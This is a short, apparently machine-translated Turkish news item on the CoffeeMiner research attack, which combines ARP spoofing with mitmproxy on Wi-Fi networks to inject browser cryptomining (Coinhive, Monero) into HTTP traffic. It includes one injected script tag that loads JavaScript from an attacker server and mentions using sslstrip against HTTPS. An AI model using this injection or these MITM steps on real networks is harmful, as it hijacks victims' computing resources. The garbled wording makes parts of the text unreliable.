Wi-Fi Ağları ve CoffeeMiner Saldırısı
Wi-Fi Ağları ve CoffeeMiner Saldırısı |
Arnau sadece eğitim ve araştırma amaçlı oluşturulan teorik akademik araştırma gibi CoffeeMiner kavramı ve kaynak kodu yayınlar vurgular. Saldırı esasen Arjantin'de yaşananlar tekrarlar ve orijinal saldırıyı verir man-in-the-middle. sızdırma Adres Çözümleme Protokolü (ARP) için CoffeeMiner aynı ağ içinde cihazlardan şifresiz trafiği kesmek için. aşağıdaki gibi bilinen mitmproxy aracını kullanarak korumasız trafikte Enjeksiyon için, HTML kodu görünüyor:
<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>
Bu mağdur Madencilik CPU kaynaklarını geciktirir JavaScript başlar. Bizim testlerde araştırmacılar popüler "tarayıcı" mayningovy senaryoyu Coinhive ve çıkarılan cryptocurrency Monero kullandı.
Uzman, böyle bir saldırının kolayca otomatikleştirilebileceğini not eder. CoffeeMiner bu formu HTTPS ile çalışmak mümkün olmasa da, bu sorun sslstrip kullanarak, örneğin, çözülebilir.
İncelemeler Aşağıda VirtualBox'ta CoffeeMiner bir gösteri görmek ve gerçek hayatta olabilir.
https://www.youtube.com/watch?v=wmYJ6Z4LoCA
https://www.youtube.com/watch?v=-TnzGLUD0DU
Kaynak: https://exploit.in/2018/11352/
Yorumlar
Yorum Gönder